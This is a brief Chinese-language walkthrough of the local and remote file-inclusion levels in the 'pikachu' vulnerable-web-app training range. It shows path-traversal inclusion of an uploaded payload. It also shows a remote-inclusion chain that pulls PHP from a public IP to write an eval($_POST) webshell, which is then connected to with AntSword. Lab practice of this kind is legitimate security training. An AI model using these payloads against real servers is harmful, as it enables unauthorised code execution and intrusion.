pikachu文件包含漏洞靶场攻略

一、File inclusion(local)(本地文件包含)

1.打开pikachu的本机包含文件靶场

2.随意提交查询

可以看到是get传参 可以在filename参数进行文件包含

3.准备好一个jpg文件

<?php phpinfo(); ?>将内容写到1.jpg中

点击上传文件 上传1.jpg

文件上传成功

4.filename后面输入../../../../1.php访问php文件

二、File Inclusion(remote)(远程文件包含)

一,修改配置

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

二,随意提交查询

三,宝塔公网上创建一个6.txt文件,

里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST"cmd");?>')?>

四,filename后面输入http://47.121.212.101/6.txt

五,fileinclude目录下找到php文件

六,访问php文件,蚁剑连接

相关推荐
甄同学28 分钟前
第十七篇:Bash Executor命令执行器,安全运行Shell命令
开发语言·安全·bash
h3guang Official31 分钟前
K8s安全实战:从漏洞靶场到红蓝对抗
安全·容器·kubernetes
星释2 小时前
鸿蒙智能体开发实战:29.智能体安全与成本优化
服务器·安全·华为·harmonyos·鸿蒙·智能体
数据知道3 小时前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
humors2213 小时前
【转帖】关于防范AI编程工具Claude Code安全后门隐患的风险提示
网络·安全·ai编程
梦帮科技4 小时前
Rust+Tauri+EVM:构建下一代内存安全级数字版权(DRM)主权音频网络与跨链金融系统的技术实践与全景架构
网络·安全·架构·rust·区块链·音视频·web3.py
@insist1235 小时前
系统规划与管理师-信息安全规划概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
xixixi7777715 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_4665252916 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz5678916 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信